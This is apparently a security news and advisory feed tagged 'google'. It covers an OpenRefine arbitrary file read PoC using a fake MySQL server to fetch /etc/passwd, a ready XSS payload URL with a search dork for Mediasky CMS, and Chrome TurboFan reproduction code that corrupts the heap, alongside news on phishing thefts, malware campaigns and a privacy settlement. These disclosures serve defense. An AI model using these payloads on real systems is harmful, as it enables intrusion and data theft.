OpenRefine is a powerful free, open source tool for working with messy data. Prior to version 3.7.5, an arbitrary file read vulnerability allows any unauthenticated user to read a file on a server. Version 3.7.5 fixes this issue.

**Summary**

An arbitrary file read vulnerability allows any unauthenticated user to read the file on the server.\_

**Details**

Hi,Team,  
i find openrefine support to import data from database,When use mysql jdbc to connect to database,It is vulnerable to jdbc url attacks,for example,unauthenticated attacker can read the file on the server.  
There are some differences in utilization depending on the version of the mysql-connector dependency on the server side.

1.  mysql-connector-java version > 8.14  
    The default value of allowLoadLocalInfile on the server side is false in this case.We need to manually set this value to true in the connection string.  
    Since the way to get the databaseurl in com/google/refine/extension/database/mysql/MySQLConnectionManager.java is to splice the individual configurations directly, we can set the allowLoadLocalInfile parameter after the other parameters(for example the databaseName parameter ).  
      
      
    
2.  mysql-connector-java version <= 8.14  
    The default value of allowLoadLocalInfile on the server side is true in this case.so wo don't need do anything,Just connect to our malicious server.

**PoC**

env:  
centos 7  
openrefine 3.7.4  
jdk11  
mysql-connector-java version 8.30.0

you can use the tool https://github.com/4ra1n/mysql-fake-server to running a malicious mysql server.  
  
for example,to read the /etc/passwd file.  
  
set the username to base64ZmlsZXJlYWRfL2V0Yy9wYXNzd2Q= and Database name to test?allowLoadLocalInfile=true# (for mysql-connector-java version <= 8.14,just setting the database name normally) and test to connect your malicious mysql server.  
you can get the file in your fake-server-files directory.  

**Impact**

An arbitrary file read vulnerability allows any unauthenticated user to read the file on the server.\_

CVE-2023-41886: Arbitrary file read in project import with mysql jdbc url attack

By Habiba Rashid
According to reports, a Google Account Sync vulnerability was exploited to carry out a voice phishing scam that led to the theft of $15 million from Fortress Trust.
This is a post from HackRead.com Read the original post: Google Account Sync Vulnerability Exploited to Steal $15M

*   **A sophisticated hacking group targeted cryptocurrency firms by exploiting a vulnerability in Google Authenticator.**

*   **The hackers targeted Retool, a software development platform that is used by a number of Fortune 500 companies.**

*   **The hackers used a combination of phishing, social engineering, and deepfakes to trick employees into giving up their credentials.**

*   **The messages instructed recipients to access a legitimate-looking link in order to address some payroll and open enrollment issues.**

*   **The attack resulted in the theft of $15 million worth of customer funds.**
*   **Google has since updated Google Authenticator to address the vulnerability.**

In a recent incident, cryptocurrency custodian Fortress Trust lost $15 million worth of customer funds **in a theft** that was traced back to a phishing attack on a third-party vendor, Retool.

Retool is a software development platform that is used by a number of Fortune 500 companies, including Amazon, DoorDash, Unity, NBC, Mercedes-Benz, Volvo, Lyft, and Peloton. 

The attackers targeted Retool employees with **SMS-based phishing messages** that appeared to come from a member of the company’s IT team. The messages instructed recipients to access a legitimate-looking link in order to address some payroll and open enrollment issues. One employee fell for the attack and handed over their credentials and multi-factor authentication (MFA) data.

What set this attack apart was the **hackers’ use of deepfake technology** to mimic an employee’s voice during a follow-up phone call. This convincing impersonation led to the employee inadvertently providing the attacker with an additional MFA code. Armed with this code, the hacker gained access to the employee’s Okta account, allowing them to add their own device to it.

The critical vulnerability exploited in this incident was related to Google Authenticator, a widely used tool for multi-factor authentication. A recent Google update has introduced a feature that syncs MFA codes to the cloud. If an attacker compromises a user’s Google account, they can obtain all MFA codes, essentially turning what was supposed to be multi-factor authentication into single-factor authentication.

Retool **expressed frustration** over the lack of a clear option to disable this feature and noted the novel attack vector it had become. While the identity of the hackers remains unclear, the attack shares similarities with previous activities attributed to the financially motivated threat group known as 0ktapus, Scattered Spider, and UNC3944.

Due to the growing threat of deepfakes for social engineering, U.S. agencies CISA, FBI, and NSA have **published** (PDF) a cybersecurity report highlighting the growing threat of deepfake technology in various malicious activities, including business email compromise attacks and cryptocurrency scams.

In order to mitigate these risks, cryptocurrency companies should implement strong security measures, such as multi-factor authentication and regular security audits. They should also be careful about which **third-party vendors** they use.

Google Account Sync Vulnerability Exploited to Steal $15M

By Deeba Ahmed
A free download manager site redirected some of its visitors to a malicious Debian package repository that installed a Linux Password Stealer malware as part of an extensive, longstanding supply chain attack.
This is a post from HackRead.com Read the original post: Free Download Manager Site Pushed Linux Password Stealer

Remember: There ain’t no such thing as a free lunch!

**KEY FINDINGS**

*   **A supply chain attack on the Free Download Manager website redirected some users to a malicious Debian package that installed password-stealing malware.**

*   **The malicious package was hosted on the domain “deb.fdmpkgorg” and contained a post-install script that downloaded two executables to the /var/tmp/crond and /var/tmp/bs file paths.**

*   **The crond job scheduler was used to force a document present at /var/tmp/crond to launch repeatedly at 10-minute intervals, effectively backdooring the infected systems.**

*   **The attacker then established a reverse shell to their owned server and installed a Bash stealer on the infected system.**

*   **The Bash stealer collects sensitive data such as system details, browsing history, cryptocurrency wallet files, saved passwords, and cloud services credentials.**

*   **The campaign is no longer active, but the end goals of the attackers are still unknown.**

*   **Not all users who downloaded the Free Download Manager received the malicious package, which may have helped the campaign to go undetected for so long.**

*   **This highlights the need to secure Linux desktops and server devices with effective and reliable security solutions.**

It is hard to process, yet not surprising, that a widely trusted free software download site was exposing unsuspected users to information-stealing malware for the past three years, and no one could have detected it until this week. 

According to the cybersecurity firm Kaspersky, the malicious supply chain attack remained active from 2020 to 2022 but was only recently discovered by its researchers while investigating suspicious domains.

According to Kaspersky’s blog post, a website “freedownloadmanagerorg” used to offer e legit Linux software “Free Download Manager.” Since January 2020, it started offering a benign version of this software after redirecting users to a malicious Debian package that contained a post-install script.

Researchers noted that the website redirected users to another domain “deb.fdmpkgorg,” which hosted the Debian package. The script downloaded two executables to the /var/tmp/crond and /var/tmp/bs file paths.

This script used the cron job scheduler to force a document present at /var/tmp/crond to launch repeatedly at 10 minutes intervals so that the systems that have installed this decoyed version of the Free Download Manager were backdoored permanently. For your information, crond, aka Bew, is a backdoor variant discovered in 2013.

The attacker then established a reverse shell to their owned server and installed a Bash stealer on the infected system. This stealer was previously analyzed by Yoroi in June 2019. It collects sensitive data such as system details, browsing history, cryptocurrency wallet files, saved passwords, and cloud services credentials, including AWS, Oracle Cloud Infrastructure, Google Cloud, and Azure.

After collecting these details, the malicious stealer contacts the C2 server to download an uploader binary and saves it to this path: /var/tmp/atd. This binary is then used for uploading stealer execution results to the malware operator’s infrastructure.

The screenshot shows the attack flow, the domain to which users were redirected, a YouTube video demonstrating how to download manager showing the malicious package being dropped from the site, and users complaining about the malware in 2021.

“The communication protocol is, depending on the connection type, either SSL or TCP. In the case of SSL, the crond backdoor launches the /var/tmp/bs executable and delegates all further communications to it. Otherwise, the reverse shell is created by the crond backdoor itself,” the report read.

Nevertheless, the team at Free Download Manager has apologized to its users and vowed to implement better security measures. It has also urged users to scan their system and change their passwords.

> “If you were among the subset of users who tried to download FDM for Linux from our compromised page during the mentioned timeframe, we strongly recommend conducting a malware scan on your system and updating your passwords as a precautionary measure.”
> 
> Free Download Manager team

Thankfully, this campaign isn’t active anymore. The campaign’s end goals are still under investigation. However, an interesting finding is that not all users who downloaded the Free Download Manager received the malicious package. Perhaps this is how the campaign remained undetected for so long. This highlights the growing need to secure Linux desktops and server devices with effective and reliable security solutions.

**RELATED ARTICLES**

1.  Malware hits Freelancers at Fiverr and Freelancer.com
2.  Almost Every Major Free VPN Service is a Glorified Data Farm
3.  Popular free Android VPN apps on Play Store contain malware
4.  Free WinZip trial popup vulnerability lets hackers drop malware
5.  This malware hides behind free VPN, pirated security software keys

Free Download Manager Site Pushed Linux Password Stealer

Italia Mediasky CMS version 2.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : İtalia Mediasky CMS v2.0 XSS Vulnerability                                                                         || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://www.bereewineshop.com/admin/                                                                                |  | # Dork      : Mediasky - Lato Amministrativo                                                                                     |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] use payload : /admin/visimmagine.php?imgname=1%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/indoushka/)%3C/ScRiPt%3E[+] http://www.127.0.0.9bereewineshopcom/admin/visimmagine.php?imgname=1%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/indoushka/)%3C/ScRiPt%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Italia Mediasky CMS 2.0 Cross Site Scripting

Italia Mediasky CMS version 2.0 suffers from a cross site request forgery vulnerability.

Italia Mediasky CMS 2.0 Cross Site Request Forgery

Chrome suffers from a read-only property overwrite in TurboFan.

    Chrome: Read-only property overwrite in TurboFanVULNERABILITY DETAILSWhile collecting information for a property store, TurboFan bails out if the property isn't writable[2]. Unfortunately, the branch condition[1] does not include one of the store modes, namely `kDefine`. This allows an attacker to overwrite arbitrary non-configurable, read-only properties. It takes a few extra steps to convince TurboFan to compile a vulnerable function -- see the reproduction case section.This issue can be abused to trigger a type confusion in `JsonStringifier::Serialize_`. The function assumes that a `JSRawJson` object can only have a string as its `rawJSON` property value, because `JSRawJson::Create` freezes the object[3] before returning it to the user. Therefore, `Serialize_` doesn't perform a type check before casting the result of `GetProperty` to the string type[4]. `AppendString` might then attempt to concatenate the bogus string[5], corrupting the heap.REFERENCEShttps://source.chromium.org/chromium/chromium/src/+/refs/heads/main:v8/src/compiler/access-info.cc;drc=5992439d25f71ce29efa8db1c699b99e8773d41f;l=708```PropertyAccessInfo AccessInfoFactory::ComputePropertyAccessInfo(    MapRef map, NameRef name, AccessMode access_mode) const {[...]  while (true) {    PropertyDetails details = PropertyDetails::Empty();    InternalIndex index = InternalIndex::NotFound();    if (!TryLoadPropertyDetails(map, holder, name, &index, &details)) {      return Invalid();    }    if (index.is_found()) {      if (access_mode == AccessMode::kStore ||  // *** 1 ***          access_mode == AccessMode::kStoreInLiteral) {        DCHECK(!map.is_dictionary_map());        // Don't bother optimizing stores to read-only properties.        if (details.IsReadOnly()) return Invalid();  // *** 2 ***[...]}```https://source.chromium.org/chromium/chromium/src/+/main:v8/src/objects/js-raw-json.cc;drc=93e93056e3849e78a8c77fe6fd0c2a0983a0b3f4;l=17```MaybeHandle<JSRawJson> JSRawJson::Create(Isolate* isolate,                                         Handle<Object> text) {  DCHECK(v8_flags.harmony_json_parse_with_source);  Handle<String> json_string;  ASSIGN_RETURN_ON_EXCEPTION(isolate, json_string,                             Object::ToString(isolate, text), JSRawJson);  Handle<String> flat = String::Flatten(isolate, json_string);  if (String::IsOneByteRepresentationUnderneath(*flat)) {    if (!JsonParser<uint8_t>::CheckRawJson(isolate, flat)) {      DCHECK(isolate->has_pending_exception());      return MaybeHandle<JSRawJson>();    }  } else {    if (!JsonParser<uint16_t>::CheckRawJson(isolate, flat)) {      DCHECK(isolate->has_pending_exception());      return MaybeHandle<JSRawJson>();    }  }  Handle<JSObject> result =      isolate->factory()->NewJSObjectFromMap(isolate->js_raw_json_map());  result->InObjectPropertyAtPut(JSRawJson::kRawJsonInitialIndex, *flat);  JSObject::SetIntegrityLevel(isolate, result, FROZEN, kThrowOnError).Check();  // *** 3 ***  return Handle<JSRawJson>::cast(result);}```https://source.chromium.org/chromium/chromium/src/+/main:v8/src/json/json-stringifier.cc;drc=221294ce14cb14f84afa156f3c590700bc615dc1;l=530```JsonStringifier::Result JsonStringifier::Serialize_(Handle<Object> object,                                                    bool comma,                                                    Handle<Object> key) {[...]  InstanceType instance_type =      HeapObject::cast(*object).map(cage_base).instance_type();  switch (instance_type) {[...]    case JS_RAW_JSON_TYPE:      DCHECK(v8_flags.harmony_json_parse_with_source);      if (deferred_string_key) SerializeDeferredKey(comma, key);      {        Handle<JSRawJson> raw_json_obj = Handle<JSRawJson>::cast(object);        Handle<String> raw_json;        if (raw_json_obj->HasInitialLayout(isolate_)) {          // Fast path: the object returned by JSON.rawJSON has its initial map          // intact.          raw_json = Handle<String>::cast(handle(              raw_json_obj->InObjectPropertyAt(JSRawJson::kRawJsonInitialIndex),              isolate_));        } else {          // Slow path: perform a property get for \"rawJSON\". Because raw JSON          // objects are created frozen, it is still guaranteed that there will          // be a property named \"rawJSON\" that is a String. Their initial maps          // only change due to VM-internal operations like being optimized for          // being used as a prototype.          raw_json = Handle<String>::cast(  // *** 4 ***              JSObject::GetProperty(isolate_, raw_json_obj,                                    isolate_->factory()->raw_json_string())                  .ToHandleChecked());        }        builder_.AppendString(raw_json); // *** 5 ***      }[...]}```VERSIONGoogle Chrome 114.0.5735.90 (Official Build) V8 version 11.6.0REPRODUCTION CASE```const PROP_NAME = \"rawJSON\",      PROP_VALUE = 0x21212121;  // Will be interpreted as a compressed pointer by `Serialize_`.let define_property_holder = {};define_property_holder.for_deprecation = 1;  // See below.function ReturnHolder() { return define_property_holder; };class Trigger extends ReturnHolder {  // Extend a function that returns a value so that it possible                                      // to store on an existing object.  [PROP_NAME] = (     // A keyed class property initializer is translated to a `kDefine` store.    this[PROP_NAME],  // The store operation performed on the target object will always throw in                      // the interpreter, so the object's map won't be added to the feedback slot.                      // Emit a load so that its feedback map can be reused by the store.    PROP_VALUE  )};for (let i = 0; i < 10; ++i)  new Trigger;  // The store operation has to have a non-empty feedback slot. Use a regular object                // with the writable target property for that.define_property_holder.for_deprecation = 1.1;  // Deprecate the map in the feedback vector so that                                               // it's discarded by TurboFan.define_property_holder = JSON.rawJSON(\"1\");    // The special target object.try { new Trigger } catch { }  // Add the target object map to the load operation's feedback slot.%OptimizeFunctionOnNextCall(Trigger);new Trigger;JSON.stringify(define_property_holder);```CREDIT INFORMATIONSergei Glazunov of Google Project ZeroThis bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2023-09-05.Related CVE Numbers: CVE-2023-4352.Found by: glazunov@google.com

Chrome Read-Only Property Overwrite

Google has agreed to pay $93 million to settle a lawsuit filed by the U.S. state of California over allegations that the company's location-privacy practices misled consumers and violated consumer protection laws.
"Our investigation revealed that Google was telling its users one thing – that it would no longer track their location once they opted out – but doing the opposite and continuing to

Privacy / Online Security

Google has agreed to pay $93 million to settle a lawsuit filed by the U.S. state of California over allegations that the company's location-privacy practices misled consumers and violated consumer protection laws.

"Our investigation revealed that Google was telling its users one thing – that it would no longer track their location once they opted out – but doing the opposite and continuing to track its users' movements for its own commercial gain," California Attorney General Rob Bonta said.

The lawsuit is in response to disclosures that the company continued to track users' locations despite stating to the contrary that such information would not be stored if the "Location History" setting was disabled.

The complaint filed by California alleged that Google collected location data through other sources and that it deceived users about their ability to opt out of personalized advertisements targeted to their location.

With Google making over $220 billion in revenue in 2022 from advertising alone, the development is the latest in a series of financial settlements made by the Mountain View-based company to resolve multiple lawsuits filed by different states in the U.S.

Last November, it agreed to pay $391.5 million to settle similar complaints by 40 U.S. states. Then in January 2023, it agreed to pay a total of $29.5 million to settle two different lawsuits brought by Indiana and Washington, D.C.

Subsequently, in May 2023, the company settled with Washington state for $39.9 million for the same reasons. It's currently facing a location tracking lawsuit in the state of Texas.

UPCOMING WEBINAR

Identity is the New Endpoint: Mastering SaaS Security in the Modern Age

Dive deep into the future of SaaS security with Maor Bin, CEO of Adaptive Shield. Discover why identity is the new endpoint. Secure your spot now.

Supercharge Your Skills

The tech giant, which has not admitted to any wrongdoing, has maintained that they are based on "outdated product policies that we changed years ago." It also agreed to provide greater controls and transparency to users over location data.

The development comes two weeks after Austrian privacy non-profit NOYB (short for None of Your Business) filed three complaints against Google-owned Fitbit for forcing new users of its app to consent to sensitive data transfers outside the European Union that may not have the same level of protection as the bloc.

"Contrary to legal requirements, users aren't even provided with a possibility to withdraw their consent," it further added. "Instead, they have to completely delete their account to stop illegal processing."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Google Agrees to $93 Million Settlement in California's Location-Privacy Lawsuit

The threat actors behind RedLine and Vidar information stealers have been observed pivoting to ransomware through phishing campaigns that spread initial payloads signed with Extended Validation (EV) code signing certificates.
"This suggests that the threat actors are streamlining operations by making their techniques multipurpose," Trend Micro researchers said in a new analysis published this

Ransomware / Cyber Threat

The threat actors behind RedLine and Vidar information stealers have been observed pivoting to ransomware through phishing campaigns that spread initial payloads signed with Extended Validation (EV) code signing certificates.

"This suggests that the threat actors are streamlining operations by making their techniques multipurpose," Trend Micro researchers said in a new analysis published this week.

In the incident investigated by the cybersecurity company, an unnamed victim is said to have first received a piece of info stealer malware with EV code signing certificates, followed by ransomware using the same delivery technique.

In the past, QakBot infections have leveraged samples signed with valid code signing certificates to bypass security protections.

The attacks start with phishing emails that employ well-worn lures to trick victims into running malicious attachments that masquerade as PDF or JPG images but are actually executables that jump-start the compromise upon running.

While the campaign targeting the victim delivered stealer malware in July, a ransomware payload made its way in early August after receiving an email message containing a bogus TripAdvisor complaint email attachment ("TripAdvisor-Complaint.pdf.htm"), triggering a sequence of steps that culminated in the deployment of ransomware.

"At this point, it is worth noting that unlike the samples of the info stealer we investigated, the files used to drop the ransomware payload did not have EV certificates," the researchers said.

"However, the two originate from the same threat actor and are spread using the same delivery method. We can therefore assume a division of labor between the payload provider and the operators."

The development comes as IBM X-Force discovered new phishing campaigns spreading an improved version of a malware loader named DBatLoader, which was used as a conduit to distribute FormBook and Remcos RAR earlier this year.

DBatLoader's new capabilities facilitate UAC bypass, persistence, and process injection, indicating that it's being actively maintained to drop malicious programs that can collect sensitive information and enable remote control of systems.

The recent set of attacks, detected since late June, are engineered to also deliver commodity malware such as Agent Tesla and Warzone RAT. A majority of the email messages have singled out English speakers, although emails in Spanish and Turkish have also been spotted.

"In several observed campaigns the threat actors leveraged sufficient control over the email infrastructure to enable malicious emails to pass SPF, DKIM, and DMARC email authentication methods," the company said.

"A majority of campaigns leveraged OneDrive to stage and retrieve additional payloads, with a small fraction otherwise utilizing transfer\[.\]sh or new/compromised domains."

UPCOMING WEBINAR

Identity is the New Endpoint: Mastering SaaS Security in the Modern Age

Dive deep into the future of SaaS security with Maor Bin, CEO of Adaptive Shield. Discover why identity is the new endpoint. Secure your spot now.

Supercharge Your Skills

In related news, Malwarebytes revealed that a new malvertising campaign is targeting users who are searching for Cisco's Webex video conferencing software on search engines like Google to redirect them to a fake website that propagates the BATLOADER malware.

BATLOADER, for its part, establishes contact with a remote server to download a second-stage encrypted payload, which is another known stealer and keylogger malware referred to as DanaBot.

A novel technique adopted by the threat actor is the use of tracking template URLs as a filtering and redirection mechanism to fingerprint and determine potential victims of interest. Visitors who don't meet the criteria (e.g., requests originating from a sandboxed environment) are directed to the legitimate Webex site.

"Because the ads look so legitimate, there is little doubt people will click on them and visit unsafe sites," Jérôme Segura, director of threat intelligence at Malwarebytes, said.

"The type of software being used in those ads indicate that threat actors are interested in corporate victims that will provide them with credentials useful for further network 'pentesting' and, in some cases, ransomware deployment."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Cybercriminals Combine Phishing and EV Certificates to Deliver Ransomware Payloads

A stored cross-site scripting (XSS) vulnerability in Webmin v2.100 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the cloned module name parameter.

Webmin is a web-based system administration tool for Unix-like servers, and services with about 1,000,000 yearly installations worldwide. Using it, it is possible to configure operating system internals, such as users, disk quotas, services or configuration files, as well as modify, and control open-source apps, such as **BIND** DNS Server, **Apache** HTTP Server, **PHP**, **MySQL**, and many more.

Add support for Amazon Linux 2023 Fix a bug in Network Configuration module when parsing network size Fix Netplan related bugs in Network Configuration module Fix a bug with initial focus in Terminal module Fix to correctly compare Webmin semantic versions Fix to suppress output from monitor.pl command Fix bugs when reading and replying to HTML email in Usermin Assets File Size File Size Webmin Usermin webmin-2.102-1.noarch.rpm 40.8 MB usermin-2....

Add support for reading gzipped email messages Add error\_stderr API Fix to show correct locale for sudo-capable users webmin/authentic-theme#1663 Fix new signing key import on Debian and derivatives Fix to check if password hash format is valid for yescrypt and SHA512 Fix print email functionality for Read User Mail module (for both Webmin and Usermin) Fix various XSS related issues Assets File Size File Size Webmin Usermin webmin-2.101-1.noarch.rpm 40.8 MB usermin-2....

Add full support for NetworkManager in Network Configuration module Add the Terminal module to Usermin Add support for WebGL in the Terminal module Add screen reader support in Terminal module Add significant improvements to read, reply and compose mail functionality Add support for loading images via the server when reading mail Add support for showing defaults for options in PHP Configuration module Add new pagination mode in Users and Groups module Fix correctly displaying bridges with Netplan in Network Configuration module Fix displaying active network interfaces in Network Configuration module Fix to consider current drive temperature in smartctl output #1881 Fix to properly stop Usermin usermin/issues/89 Fix no to add hashed password to the old password list twice Fix displaying placeholder on input to reflect strftime-style format Update Authentic theme to the latest version adding new vertical column layout Assets File Size File Size Webmin Usermin webmin-2....

Fix support for enabling and disabling the HTTP2 protocol Fix several bugs in the creation of AAAA and MX records Fix bugs in the management of secondary mail servers Fix creating mail forwards and auto-replies Add automatic use of Cloud credentials if available when backing up to S3 or GCS running on Amazon EC2 or Google Compute Engine

Add ability to host DNS zones on remote Webmin servers Add support for EC SSL certificates Add support for remote databases for PostgreSQL in the same way as MySQL Add an option to share the same DNS zone file with different owners

Add ability to set locale in Webmin Users module for consistency Fix to preserve initial install directory when upgrading manually Fix to preserve minimal install type when upgrading manually Fix an error when make\_date is called on undefined value #1860 Fix clearing packages caches before checking for updates in status collection #1863 Update the Authentic theme to the latest version Assets File Size webmin-2.021-1.noarch.rpm 39.6 MB webmin\_2.021\_all.deb 32.5 MB webmin-2....

Add full locale support Add slave zone file format option in BIND DNS module Add support for editing ACLs in File Manager Add support to configure SSL connection for MySQL/MariaDB module Add support for compressed backups in PostgreSQL module Add support for displaying inodes too in Disk Usage in the Dashboard Add better support for CloudLinux Fix to always default to RSA key type in Let’s Encrypt requests Fix setup repository script for Oracle Fix shutdown timeout to avoid termination of running processes Fix support for SpamAssassin 4 Fix to use system default hashing format for htpasswd file Fix FastRPC issues Update the Authentic theme to the latest version, with sped-up Dashboard performance Assets File Size webmin-2....

Fix Authentic theme issue with error handling Fix Framed theme to respect selected mode in left menu Assets File Size webmin-2.013-1.noarch.rpm 39.9 MB webmin\_2.013\_all.deb 32.7 MB webmin-2.013.tar.gz 44.9 MB webmin-2.013.pkg.gz 44.3 MB

Fix to set the correct algorithm when setting up RNDC #1817 Fix the loop bug when sourcing other network configs in Debian Fix to include all Debian network config files in backups Fix to stop doing expensive package re-fetch on upgrades Add support for defining hostname for WebSocket connection Add Debian 12 support Assets File Size webmin-2.012-1.noarch.rpm 39.9 MB webmin\_2.012\_all.deb 32.7 MB webmin-2.012.tar.gz 44.9 MB webmin-2.012.pkg.gz 44.3 MB

Add ability to set shell character encoding and set TERM environmental variable in the new Terminal module Add support for editing network interfaces in include files for Debian systems Add various improvements to the old good Framed Theme Fix to change Gray Framed Theme name to Framed Theme Fix to verify and close WebSocket session, if parent session was closed Fix to remove RC4 from the list of strong ciphers Fix don’t fail LDAP user or group deletion, if they have already been deleted Fix error handling in MySQL/MariaDB Database server module when executing SQL commands Fix adding an extra server attachment field and other bugs in Read User Mail module Fix the link to release notes for Rocky Linux Fix issues with freezing and thawing dynamic reverse zones in BIND DNS Server module Fix bugs for modules granting anonymous access Fix mailbox\_idle\_check\_interval option related bugs in Dovecot module sourceforge....

CVE-2023-40982: Webmin

Froala Editor v4.0.1 to v4.1.1 was discovered to contain a cross-site scripting (XSS) vulnerability.

Tag

#google